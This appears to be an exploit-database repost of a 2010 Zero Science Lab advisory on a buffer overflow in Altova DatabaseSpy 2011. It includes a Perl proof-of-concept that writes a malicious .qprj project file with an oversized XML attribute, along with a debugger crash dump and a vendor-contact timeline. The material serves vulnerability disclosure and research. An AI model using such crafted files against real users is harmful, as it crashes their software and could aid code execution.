Home / os / win7

[dos / poc] - Altova DatabaseSpy 2011 Project File Handling

Posted on 21 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability by LiquidWorm in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================================
Altova DatabaseSpy 2011 Project File Handling Buffer Overflow
=============================================================

#!/usr/bin/perl
#
#
# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
#
#
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
#
#
# Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
#
#
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundry checking of some XML tag
# property values, ex: &lt;Folder FolderName=&quot;SQL&quot; Type=&quot;AAAAAAA..../&gt;&quot; (~1000 bytes).
# This can aid the attacker to execute arbitrary machine code in the context of an
# affected node (locally and remotely) via file crafting or computer-based social
# engineering.
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#----------------------------------------------------------------------------------#
#
#   (342c.37c0): Access violation - code c0000005 (first chance)
#   First chance exceptions are reported before any exception handling.
#   This exception may be expected and handled.
#   eax=04430041 ebx=0203ff98 ecx=0443deda edx=56413f2e esi=0022dd98 edi=00000016
#   eip=00420b83 esp=0022dc00 ebp=00000017 iopl=0         nv up ei pl nz na po nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
#   *** ERROR: Symbol file could not be found.  Defaulted to export symbols for
#   DatabaseSpy.exe - DatabaseSpy+0x20b83:
#   00420b83 663b02          cmp     ax,word ptr [edx]        ds:0023:56413f2e=????
#
#----------------------------------------------------------------------------------#
#
#
# Vulnerability discovered by: Gjoko &#039;LiquidWorm&#039; Krstic
#                              liquidworm gmail com
#                              Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status: [17.10.2010] Vulnerability discovered.
#                [17.10.2010] Initial contact with the vendor with sent PoC files.
#                [21.10.2010] No reply from vendor.
#                [22.10.2010] Public advisory released.
#
#
# Advisory ID: ZSL-2010-4971
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4971.php
# Advisory TXT: http://www.zeroscience.mk/codes/dbspy_bof.txt
#
#
# 17.10.2010
#
 
use strict;
system cls;
 
 
sub header()
{
    print &quot;
        @=---===---===---===---===---===---===---===---=@
        |                       |
        |   Proof Of Concept PERL script for    |
        |                       |
        |  Altova DatabaseSpy 2011 (Enteprise Edition)  |
        |                       |
        |                       |
        |                       |
        |                       |
        |              ---          |
        |                       |
        |       Copyleft (c) 2010       |
        |                       |
        |  Zero Science Lab - http://www.zeroscience.mk |
        |                       |
        @=---===---===---===---===---===---===---===---=@
    

&quot;;
}
 
my $FILENAME = &quot;DEATH_FROM_ABOVE.qprj&quot;; #DatabaseSpy Project File
 
my $PAYLOAD = &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;. #48
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
               &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;.
              &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;; #1008B
 
               #21
 
my $PROJECT = &quot;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;xA&lt;!-&quot;.
          &quot;-  DatabaseSpy Project File  --&gt;xA&lt;Project Vers&quot;.
          &quot;ion=&quot;2&quot; Expanded=&quot;Yes&quot; Type=&quot;Root&quot; Title=&quot;.
          &quot;&quot;test&quot;&gt;xAx9&lt;Folder FolderName=&quot;Data Sources&quot;.
          &quot;&quot; Type=&quot;DataSourceFolder&quot;/&gt;xAx9&lt;Folder Fol&quot;.
          &quot;derName=&quot;SQL&quot; Type=&quot;SQLRootFolder&quot; database&quot;.
          &quot;_kind=&quot;Unknown&quot; datasource=&quot;Offline&quot; descrip&quot;.
          &quot;tion=&quot;Store and organize SQL files for this pro&quot;.
          &quot;ject.&quot; blockingstrategy=&quot;semi&quot;/&gt;xAx9&lt;Folder&quot;.
          &quot; FolderName=&quot;Design&quot; Type=&quot;$PAYLOAD&quot; databas&quot;.
          &quot;e_kind=&quot;Unknown&quot; datasource=&quot;Offline&quot; descri&quot;.
          &quot;ption=&quot;I LOVE VERONICA CORNINGSTONE.&quot;/&gt;xAx9&lt;&quot;.
          &quot;Folder FolderName=&quot;Data Diff&quot; Type=&quot;DataDiffR&quot;.
          &quot;ootFolder&quot;/&gt;xAx9&lt;Folder FolderName=&quot;Schema D&quot;.
          &quot;iff&quot; Type=&quot;Schema DiffRootFolder&quot;/&gt;xAx9&lt;Fol&quot;.
          &quot;der FolderName=&quot;Favorites&quot; Type=&quot;FavoriteFold&quot;.
          &quot;er&quot;/&gt;xA&lt;/Project&gt;xA&quot;;
 
sub code()
{
          system (&quot;color 3&quot;); #~!@#$%^&amp;*()_+|&lt;&gt;?:&quot;{}=-`&#039;;/.,0
          open qprj, &quot;&gt;./$FILENAME&quot; || die &quot;
Can&#039;t open #$_@
          $FILENAME: $!&quot;; print &quot;
 (1) &quot;; system(&quot;pause&quot;); #
          print qprj $PROJECT; print &quot;
 (2) Buffering mali&quot;.
          &quot;cious format file . . .
&quot;; sleep 2; close qprj;
          print &quot;
 (3) File $FILENAME created successfully&quot;.
          &quot;!
&quot;; sleep 2; system (&quot;color x44&quot;); sleep 1; #.%
          print &quot;
 (4) And the color is changed.
&quot;;
}
 
print &quot;
&quot;;
header();
code();
 
#EOF


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-21]</pre></body></html>

 

TOP

Malware :

Exploits :